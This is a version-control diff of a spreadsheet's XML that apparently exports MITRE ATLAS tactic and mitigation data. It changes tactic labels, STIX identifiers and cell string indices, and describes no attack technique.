   <si>
     <t>ML Model Access</t>
@@ -1734,6 +1907,9 @@
     <t>ML Attack Staging</t>
   </si>
   <si>
+    <t>Defense Evasion</t>
+  </si>
+  <si>
     <t>Execution</t>
   </si>
   <si>
@@ -1746,9 +1922,6 @@
     <t>Collection</t>
   </si>
   <si>
-    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</t>
-  </si>
-  <si>
     <t>Discovery</t>
   </si>
   <si>
@@ -1761,9 +1934,6 @@
     <t>Defense Evasion, Privilege Escalation</t>
   </si>
   <si>
-    <t>Discovery, Exfiltration</t>
-  </si>
-  <si>
     <t>Execution, Privilege Escalation</t>
   </si>
   <si>
@@ -1821,49 +1991,46 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--76d8d1bc-98fb-406a-a88d-a70649ad9365</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--b7c3883a-1ae7-47cd-bd53-024c79ac833a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--35a4b685-8a9f-4f66-bef0-92c8a5fd8411</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--b3f5fda4-a31a-4a74-9588-995b143d3436</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--b777d4af-fbe8-4e44-9917-c5c5542a7147</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--55e80a13-be94-43ba-aa57-e6c5cb822864</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4386734e-fa57-4700-95b8-e76b8cab8ab3</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--14ef1e2d-f902-450a-a7e8-b032e318bb86</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--528bc2da-8855-44c0-9e45-ab92c179bf6f</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--2666e534-bf47-4656-9404-e90afe41f4a7</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4a088a36-6786-4486-a3ea-3c3576d61daa</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--ef06a48d-1ccb-42c6-b5dd-2770a58f02d8</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--9ceaa8fe-57f1-4923-a4a5-121b5111139c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--1fa998a1-d720-488c-b156-b569fe4e6308</t>
-  </si>
-  <si>
-    <t>Defense Evasion</t>
+    <t>x-mitre-tactic--b08d83b4-fdc7-4e5f-93ef-f4479a2f2a14</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a467ab89-8c73-46bf-964a-9aa30822c85d</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a24a9db4-eb43-4017-95ae-36e4157cec6a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--46dee8aa-a49e-4177-8364-8cba270649e8</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--4d802237-5f91-441b-bbd7-948b1eabbf6b</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--deb1ca66-52d8-4ba9-b48d-eae1182e45b5</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--72baacdb-3212-4cce-9785-9c068f2f3fd3</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c2ff12db-196b-4c2c-b05d-20f5423fe4f5</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--5ff2c742-46ae-42ef-9d7b-0c1d76841197</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--55db50f4-add2-4407-a20c-dc968ac3189d</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--cb60f8f6-55cd-4ab3-a54e-76c4973c0e9e</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c920f814-50c3-4d9b-b0c9-8a910b29d357</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--3fa0e3a6-3d30-4407-864d-7975b4feda3c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--56f79b50-5220-4170-bcbe-d07be1f8c8b5</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -2013,9 +2180,6 @@
     <t>https://atlas.mitre.org/tactics/AML.TA0003</t>
   </si>
   <si>
-    <t>29 October 2024</t>
-  </si>
-  <si>
     <t>relationship citations</t>
   </si>
   <si>
@@ -2097,82 +2261,82 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--1f63b56d-034f-477d-ab49-399c1aa1a22a</t>
-  </si>
-  <si>
-    <t>course-of-action--fa5108b2-3dc8-42dc-93a3-902f1bf74521</t>
-  </si>
-  <si>
-    <t>course-of-action--0ed2ef71-cdc9-4eef-8432-1c3dadbdda20</t>
-  </si>
-  <si>
-    <t>course-of-action--88073b07-2fe9-41cb-8e76-6e244fbabc74</t>
-  </si>
-  <si>
-    <t>course-of-action--0025dadf-7900-497f-aa03-39f0e319f20e</t>
-  </si>
-  <si>
-    <t>course-of-action--7b00dd51-f719-433d-afd6-3d386f64386d</t>
-  </si>
-  <si>
-    <t>course-of-action--aad92d43-774b-4612-8437-8d6c7ee7e4af</t>
-  </si>
-  <si>
-    <t>course-of-action--b8511570-3320-4733-a0e1-134e376e7530</t>
-  </si>
-  <si>
-    <t>course-of-action--d55bd0c8-2db0-400b-9097-c7cec00e2b91</t>
-  </si>
-  <si>
-    <t>course-of-action--1fca595d-b140-4ce0-8fd8-c4c6bee87540</t>
-  </si>
-  <si>
-    <t>course-of-action--73a34f24-1ad1-4421-b9c8-c2cbd13e6f47</t>
-  </si>
-  <si>
-    <t>course-of-action--79c75215-ada9-4c22-bfed-7d13fb6e966e</t>
-  </si>
-  <si>
-    <t>course-of-action--40076545-e797-4508-a294-943096a12111</t>
-  </si>
-  <si>
-    <t>course-of-action--005a5427-4b1e-41c2-a7aa-eda9ae9a9815</t>
-  </si>
-  <si>
-    <t>course-of-action--432c3a44-3974-4b73-9eb9-fa5dd5298e47</t>
-  </si>
-  <si>
-    <t>course-of-action--216f862c-7f34-4676-a913-c4ec6cc4c2cd</t>
-  </si>
-  <si>
-    <t>course-of-action--9f92e876-e2c0-4def-afee-626a4a79c524</t>
-  </si>
-  <si>
-    <t>course-of-action--179e00cb-0948-4282-9132-f8a1f0ff6bd7</t>
-  </si>
-  <si>
-    <t>course-of-action--46b3e92d-600b-47c9-80f5-ed62a5db0377</t>
-  </si>
-  <si>
-    <t>course-of-action--9395d240-cc32-452a-911b-04feea01bcfb</t>
-  </si>
-  <si>
-    <t>course-of-action--dcb586a2-1135-4e2a-97bd-d4adbc79758b</t>
-  </si>
-  <si>
-    <t>course-of-action--1bb9d9a7-c05a-470f-a709-64bd240e2eb0</t>
-  </si>
-  <si>
-    <t>course-of-action--cce983e7-13a2-4545-8c39-ec6c8dff148d</t>
-  </si>
-  <si>
-    <t>course-of-action--01c2ec0a-e257-4a75-9e59-f71aa6362b6e</t>
-  </si>
-  <si>
-    <t>course-of-action--cdccb3ab-2dde-41a9-a988-783a25b7bd00</t>
-  </si>
-  <si>
-    <t>course-of-action--79752061-aac1-4ed9-b7f3-3b4dc5e81280</t>
+    <t>course-of-action--62d0ba49-7343-48de-a756-ac5fdaf98c8f</t>
+  </si>
+  <si>
+    <t>course-of-action--e89d6eec-150c-4308-bd3e-fc51e5efdfa6</t>
+  </si>
+  <si>
+    <t>course-of-action--caf6e938-cf87-4a2c-a752-206b930f3c01</t>
+  </si>
+  <si>
+    <t>course-of-action--1a62c89b-d515-4e98-bbcd-c5e6ef78fe42</t>
+  </si>
+  <si>
+    <t>course-of-action--0fc686a3-466f-45bf-a95e-65304bc43666</t>
+  </si>
+  <si>
+    <t>course-of-action--5ec3bfe0-f7be-4286-bce1-ae762a23e79f</t>
+  </si>
+  <si>
+    <t>course-of-action--e0beab85-34fd-4915-a477-ed5efeaf9e0d</t>
+  </si>
+  <si>
+    <t>course-of-action--e2be373b-c7b9-449f-8c50-1e516d162969</t>
+  </si>
+  <si>
+    <t>course-of-action--b385f3b5-725c-45a8-b7e6-f56b35f75a4a</t>
+  </si>
+  <si>
+    <t>course-of-action--10c68f9d-a736-4d85-93bc-b0e36084cc9f</t>
+  </si>
+  <si>
+    <t>course-of-action--504b48c4-05c1-4b29-912a-2ba8db9631a9</t>
+  </si>
+  <si>
+    <t>course-of-action--6a041684-03a2-4874-9577-67749bf98de0</t>
+  </si>
+  <si>
+    <t>course-of-action--0e73d209-afa9-4540-a8c4-244bc9f604ea</t>
+  </si>
+  <si>
+    <t>course-of-action--ed176010-c43b-4055-b421-2a6f92b95504</t>
+  </si>
+  <si>
+    <t>course-of-action--dd73141b-4e51-4f90-8120-45b4d113f420</t>
+  </si>
+  <si>
+    <t>course-of-action--fbc6f93a-a8fd-4097-80e4-9b9da41cef4b</t>
+  </si>
+  <si>
+    <t>course-of-action--e54bb18b-c1a7-4700-baac-3de8a51c1097</t>
+  </si>
+  <si>
+    <t>course-of-action--954d9fe9-e75a-4a72-9db1-091ad28d23f8</t>
+  </si>
+  <si>
+    <t>course-of-action--ead3a51b-6ed6-420a-9953-fe2f6b8816dd</t>
+  </si>
+  <si>
+    <t>course-of-action--5fd900ac-6e6a-4ee7-9a11-ef58129cea5c</t>
+  </si>
+  <si>
+    <t>course-of-action--317157f6-b4a4-4887-99cc-7e900fb7e35a</t>
+  </si>
+  <si>
+    <t>course-of-action--08c232f3-a786-4fdb-89cd-bbd76943fd10</t>
+  </si>
+  <si>
+    <t>course-of-action--80c18af0-9956-4f37-b1fd-49c3785d2243</t>
+  </si>
+  <si>
+    <t>course-of-action--9f8223a7-4fd2-44de-8854-d512dfc7fb09</t>
+  </si>
+  <si>
+    <t>course-of-action--8d8c433c-2b16-438c-b3cc-7a91b2f24ef9</t>
+  </si>
+  <si>
+    <t>course-of-action--698b729b-7703-4fd2-85a2-219386f1c37f</t>
   </si>
   <si>
     <t>AI Bill of Materials</t>
@@ -2439,9 +2603,6 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0016</t>
-  </si>
-  <si>
-    <t>12 April 2023</t>
   </si>
 </sst>
 </file>
@@ -2850,7 +3011,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I92"/>
+  <dimension ref="A1:I105"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -2890,28 +3051,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>100</v>
+        <v>113</v>
       </c>
       <c r="C2" t="s">
-        <v>191</v>
+        <v>217</v>
       </c>
       <c r="D2" t="s">
-        <v>282</v>
+        <v>321</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>373</v>
+        <v>425</v>
       </c>
       <c r="F2" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G2" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="H2" t="s">
-        <v>475</v>
+        <v>530</v>
       </c>
       <c r="I2" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -2919,28 +3080,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>101</v>
+        <v>114</v>
       </c>
       <c r="C3" t="s">
-        <v>192</v>
+        <v>218</v>
       </c>
       <c r="D3" t="s">
-        <v>283</v>
+        <v>322</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>374</v>
+        <v>426</v>
       </c>
       <c r="F3" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G3" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="H3" t="s">
-        <v>476</v>
+        <v>531</v>
       </c>
       <c r="I3" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -2948,28 +3109,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>102</v>
+        <v>115</v>
       </c>
       <c r="C4" t="s">
-        <v>193</v>
+        <v>219</v>
       </c>
       <c r="D4" t="s">
-        <v>284</v>
+        <v>323</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>375</v>
+        <v>427</v>
       </c>
       <c r="F4" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G4" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H4" t="s">
-        <v>476</v>
+        <v>531</v>
       </c>
       <c r="I4" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -2977,28 +3138,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>103</v>
+        <v>116</v>
       </c>
       <c r="C5" t="s">
-        <v>194</v>
+        <v>220</v>
       </c>
       <c r="D5" t="s">
-        <v>285</v>
+        <v>324</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>376</v>
+        <v>428</v>
       </c>
       <c r="F5" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G5" t="s">
-        <v>470</v>
+        <v>529</v>
       </c>
       <c r="H5" t="s">
-        <v>477</v>
+        <v>532</v>
       </c>
       <c r="I5" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3006,28 +3167,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>104</v>
+        <v>117</v>
       </c>
       <c r="C6" t="s">
-        <v>195</v>
+        <v>221</v>
       </c>
       <c r="D6" t="s">
-        <v>286</v>
+        <v>325</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>377</v>
+        <v>429</v>
       </c>
       <c r="F6" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G6" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H6" t="s">
-        <v>476</v>
+        <v>531</v>
       </c>
       <c r="I6" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -3035,28 +3196,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>105</v>
+        <v>118</v>
       </c>
       <c r="C7" t="s">
-        <v>196</v>
+        <v>222</v>
       </c>
       <c r="D7" t="s">
-        <v>287</v>
+        <v>326</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>378</v>
+        <v>430</v>
       </c>
       <c r="F7" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="G7" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="H7" t="s">
-        <v>476</v>
+        <v>531</v>
       </c>
       <c r="I7" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -3064,28 +3225,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>106</v>
+        <v>119</v>
       </c>
       <c r="C8" t="s">
-        <v>197</v>
+        <v>223</v>
       </c>
       <c r="D8" t="s">
-        <v>288</v>
+        <v>327</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>379</v>
+        <v>431</v>
       </c>
       <c r="F8" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G8" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H8" t="s">
-        <v>478</v>
+        <v>533</v>
       </c>
       <c r="I8" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -3093,28 +3254,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>107</v>
+        <v>120</v>
       </c>
       <c r="C9" t="s">
-        <v>198</v>
+        <v>224</v>
       </c>
       <c r="D9" t="s">
-        <v>289</v>
+        <v>328</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>380</v>
+        <v>432</v>
       </c>
       <c r="F9" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G9" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H9" t="s">
-        <v>479</v>
+        <v>534</v>
       </c>
       <c r="I9" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -3122,28 +3283,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>108</v>
+        <v>121</v>
       </c>
       <c r="C10" t="s">
-        <v>199</v>
+        <v>225</v>
       </c>
       <c r="D10" t="s">
-        <v>290</v>
+        <v>329</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>381</v>
+        <v>433</v>
       </c>
       <c r="F10" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G10" t="s">
-        <v>471</v>
+        <v>529</v>
       </c>
       <c r="H10" t="s">
-        <v>479</v>
+        <v>534</v>
       </c>
       <c r="I10" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -3151,28 +3312,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>109</v>
+        <v>122</v>
       </c>
       <c r="C11" t="s">
-        <v>200</v>
+        <v>226</v>
       </c>
       <c r="D11" t="s">
-        <v>291</v>
+        <v>330</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>382</v>
+        <v>434</v>
       </c>
       <c r="F11" t="s">
-        <v>466</v>
+        <v>529</v>
       </c>
       <c r="G11" t="s">
-        <v>472</v>
+        <v>529</v>
       </c>
       <c r="H11" t="s">
-        <v>480</v>
+        <v>535</v>
       </c>
       <c r="I11" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -3180,28 +3341,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>110</v>
+        <v>123</v>
       </c>
       <c r="C12" t="s">
-        <v>201</v>
+        <v>227</v>
       </c>
       <c r="D12" t="s">
-        <v>292</v>
+        <v>331</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>383</v>
+        <v>435</v>
       </c>
       <c r="F12" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G12" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H12" t="s">
-        <v>476</v>
+        <v>536</v>
       </c>
       <c r="I12" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -3209,28 +3370,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>111</v>
+        <v>124</v>
       </c>
       <c r="C13" t="s">
-        <v>202</v>
+        <v>228</v>
       </c>
       <c r="D13" t="s">
-        <v>293</v>
+        <v>332</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>384</v>
+        <v>436</v>
       </c>
       <c r="F13" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G13" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H13" t="s">
-        <v>481</v>
+        <v>531</v>
       </c>
       <c r="I13" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="14" spans="1:9">
@@ -3238,28 +3399,28 @@
         <v>21</v>
       </c>
       <c r="B14" t="s">
-        <v>112</v>
+        <v>125</v>
       </c>
       <c r="C14" t="s">
-        <v>203</v>
+        <v>229</v>
       </c>
       <c r="D14" t="s">
-        <v>294</v>
+        <v>333</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>385</v>
+        <v>437</v>
       </c>
       <c r="F14" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G14" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H14" t="s">
-        <v>479</v>
+        <v>537</v>
       </c>
       <c r="I14" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="15" spans="1:9">
@@ -3267,28 +3428,28 @@
         <v>22</v>
       </c>
       <c r="B15" t="s">
-        <v>113</v>
+        <v>126</v>
       </c>
       <c r="C15" t="s">
-        <v>204</v>
+        <v>230</v>
       </c>
       <c r="D15" t="s">
-        <v>295</v>
+        <v>334</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>386</v>
+        <v>438</v>
       </c>
       <c r="F15" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G15" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H15" t="s">
-        <v>479</v>
+        <v>534</v>
       </c>
       <c r="I15" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="16" spans="1:9">
@@ -3296,28 +3457,28 @@
         <v>23</v>
       </c>
       <c r="B16" t="s">
-        <v>114</v>
+        <v>127</v>
       </c>
       <c r="C16" t="s">
-        <v>205</v>
+        <v>231</v>
       </c>
       <c r="D16" t="s">
-        <v>296</v>
+        <v>335</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>387</v>
+        <v>439</v>
       </c>
       <c r="F16" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G16" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H16" t="s">
-        <v>482</v>
+        <v>534</v>
       </c>
       <c r="I16" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="17" spans="1:9">
@@ -3325,28 +3486,28 @@
         <v>24</v>
       </c>
       <c r="B17" t="s">
-        <v>115</v>
+        <v>128</v>
       </c>
       <c r="C17" t="s">
-        <v>206</v>
+        <v>232</v>
       </c>
       <c r="D17" t="s">
-        <v>297</v>
+        <v>336</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>388</v>
+        <v>440</v>
       </c>
       <c r="F17" t="s">
-        <v>467</v>
+        <v>529</v>
       </c>
       <c r="G17" t="s">
-        <v>470</v>
+        <v>529</v>
       </c>
       <c r="H17" t="s">
-        <v>483</v>
+        <v>538</v>
       </c>
       <c r="I17" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="18" spans="1:9">
@@ -3354,28 +3515,28 @@
         <v>25</v>
       </c>
       <c r="B18" t="s">
-        <v>116</v>
+        <v>129</v>
       </c>
       <c r="C18" t="s">
-        <v>207</v>
+        <v>233</v>
       </c>
       <c r="D18" t="s">
-        <v>298</v>
+        <v>337</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>389</v>
+        <v>441</v>
       </c>
       <c r="F18" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G18" t="s">
-        <v>470</v>
+        <v>529</v>
       </c>
       <c r="H18" t="s">
-        <v>483</v>
+        <v>539</v>
       </c>
       <c r="I18" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="19" spans="1:9">
@@ -3383,28 +3544,28 @@
         <v>26</v>
       </c>
       <c r="B19" t="s">
-        <v>117</v>
+        <v>130</v>
       </c>
       <c r="C19" t="s">
-        <v>208</v>
+        <v>234</v>
       </c>
       <c r="D19" t="s">
-        <v>299</v>
+        <v>338</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>390</v>
+        <v>442</v>
       </c>
       <c r="F19" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G19" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H19" t="s">
-        <v>476</v>
+        <v>539</v>
       </c>
       <c r="I19" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="20" spans="1:9">
@@ -3412,28 +3573,28 @@
         <v>27</v>
       </c>
       <c r="B20" t="s">
-        <v>118</v>
+        <v>131</v>
       </c>
       <c r="C20" t="s">
-        <v>209</v>
+        <v>235</v>
       </c>
       <c r="D20" t="s">
-        <v>300</v>
+        <v>339</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>391</v>
+        <v>443</v>
       </c>
       <c r="F20" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G20" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H20" t="s">
-        <v>481</v>
+        <v>531</v>
       </c>
       <c r="I20" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="21" spans="1:9">
@@ -3441,28 +3602,28 @@
         <v>28</v>
       </c>
       <c r="B21" t="s">
-        <v>119</v>
+        <v>132</v>
       </c>
       <c r="C21" t="s">
-        <v>210</v>
+        <v>236</v>
       </c>
       <c r="D21" t="s">
-        <v>301</v>
+        <v>340</v>
       </c>
       <c r="E21" s="2" t="s">
-        <v>392</v>
+        <v>444</v>
       </c>
       <c r="F21" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="G21" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="H21" t="s">
-        <v>476</v>
+        <v>537</v>
       </c>
       <c r="I21" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="22" spans="1:9">
@@ -3470,28 +3631,28 @@
         <v>29</v>
       </c>
       <c r="B22" t="s">
-        <v>120</v>
+        <v>133</v>
       </c>
       <c r="C22" t="s">
-        <v>211</v>
+        <v>237</v>
       </c>
       <c r="D22" t="s">
-        <v>302</v>
+        <v>341</v>
       </c>
       <c r="E22" s="2" t="s">
-        <v>393</v>
+        <v>445</v>
       </c>
       <c r="F22" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="G22" t="s">
-        <v>465</v>
+        <v>529</v>
       </c>
       <c r="H22" t="s">
-        <v>484</v>
+        <v>531</v>
       </c>
       <c r="I22" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="23" spans="1:9">
@@ -3499,28 +3660,28 @@
         <v>30</v>
       </c>
       <c r="B23" t="s">
-        <v>121</v>
+        <v>134</v>
       </c>
       <c r="C23" t="s">
-        <v>212</v>
+        <v>238</v>
       </c>
       <c r="D23" t="s">
-        <v>303</v>
+        <v>342</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>394</v>
+        <v>446</v>
       </c>
       <c r="F23" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="G23" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="H23" t="s">
-        <v>485</v>
+        <v>536</v>
       </c>
       <c r="I23" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="24" spans="1:9">
@@ -3528,28 +3689,28 @@
         <v>31</v>
       </c>
       <c r="B24" t="s">
-        <v>122</v>
+        <v>135</v>
       </c>
       <c r="C24" t="s">
-        <v>213</v>
+        <v>239</v>
       </c>
       <c r="D24" t="s">
-        <v>304</v>
+        <v>343</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>395</v>
+        <v>447</v>
       </c>
       <c r="F24" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="G24" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="H24" t="s">
-        <v>485</v>
+        <v>540</v>
       </c>
       <c r="I24" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="25" spans="1:9">
@@ -3557,28 +3718,28 @@
         <v>32</v>
       </c>
       <c r="B25" t="s">
-        <v>123</v>
+        <v>136</v>
       </c>
       <c r="C25" t="s">
-        <v>214</v>
+        <v>240</v>
       </c>
       <c r="D25" t="s">
-        <v>305</v>
+        <v>344</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>396</v>
+        <v>448</v>
       </c>
       <c r="F25" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G25" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H25" t="s">
-        <v>485</v>
+        <v>540</v>
       </c>
       <c r="I25" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="26" spans="1:9">
@@ -3586,28 +3747,28 @@
         <v>33</v>
       </c>
       <c r="B26" t="s">
-        <v>124</v>
+        <v>137</v>
       </c>
       <c r="C26" t="s">
-        <v>215</v>
+        <v>241</v>
       </c>
       <c r="D26" t="s">
-        <v>306</v>
+        <v>345</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>397</v>
+        <v>449</v>
       </c>
       <c r="F26" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G26" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H26" t="s">
-        <v>485</v>
+        <v>540</v>
       </c>
       <c r="I26" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="27" spans="1:9">
@@ -3615,28 +3776,28 @@
         <v>34</v>
       </c>
       <c r="B27" t="s">
-        <v>125</v>
+        <v>138</v>
       </c>
       <c r="C27" t="s">
-        <v>216</v>
+        <v>242</v>
       </c>
       <c r="D27" t="s">
-        <v>307</v>
+        <v>346</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>398</v>
+        <v>450</v>
       </c>
       <c r="F27" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="G27" t="s">
-        <v>464</v>
+        <v>529</v>
       </c>
       <c r="H27" t="s">
-        <v>485</v>
+        <v>540</v>
       </c>
       <c r="I27" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="28" spans="1:9">
@@ -3644,28 +3805,28 @@
         <v>35</v>
       </c>
       <c r="B28" t="s">
-        <v>126</v>
+        <v>139</v>
       </c>
       <c r="C28" t="s">
-        <v>217</v>
+        <v>243</v>
       </c>
       <c r="D28" t="s">
-        <v>308</v>
+        <v>347</v>
       </c>
       <c r="E28" s="2" t="s">
-        <v>399</v>
+        <v>451</v>
       </c>
       <c r="F28" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="G28" t="s">
-        <v>468</v>
+        <v>529</v>
       </c>
       <c r="H28" t="s">
-        <v>485</v>
+        <v>540</v>
       </c>
       <c r="I28" t="s">
-        <v>494</v>
+        <v>548</v>
       </c>
     </row>
     <row r="29" spans="1:9">
@@ -3673,28 +3834,28 @@
         <v>36</v>
